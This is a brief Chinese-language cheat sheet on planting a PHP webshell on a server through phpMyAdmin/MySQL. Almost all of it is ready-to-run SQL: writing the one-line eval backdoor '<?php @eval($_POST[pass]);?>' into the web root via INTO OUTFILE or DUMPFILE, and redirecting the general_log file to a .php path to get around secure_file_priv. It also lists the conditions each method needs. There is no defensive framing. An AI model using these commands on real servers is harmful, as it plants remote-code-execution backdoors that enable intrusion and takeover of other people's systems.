phpAdmin写webshell的方法

一、常规导入shell的操作
    创建数据表导出shell
    CREATE TABLE `mysql`.`shadow9` (`content` TEXT NOT NULL );
    INSERT INTO `mysql`.`shadow9` (`content` ) VALUES (‘<?php @eval($_POST[pass]);?>’);
    SELECT `content` FROM `shadow9` INTO OUTFILE ‘C:\\phpStudy\\WWW\\90sec.php’;
    DROP TABLE IF EXISTS `shadow9`;
    
    Ps:（1）利用条件secure_file_priv=(未写路径)
         （2）知道目标的绝对路径
    
二、一句话导出shell：

select '<?php @eval($_POST[pass]);?>' into outfile 'c:/phpstudy/www/90sec.php'; 
select '<?php @eval($_POST[pass]);?>' into outfile 'c:\\phpstudy\\www\\90sec.php';
select '<?php @eval($_POST[pass]);?>' into dumpfile 'c:\\phpstudy\\www\\bypass.php';

Ps:（1）利用条件secure_file_priv=(未写路径)
     （2）知道目标的绝对路径

三、日志备份获取shell

show global variables like "%genera%";          //查询general_log配置
set global general_log='on';              //开启general log模式
SET global general_log_file='D:/phpStudy/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件
set global general_log='off';              //关闭general_log模式

Ps:（1）可以绕过secure_file_priv=
     （2）知道目标的绝对路径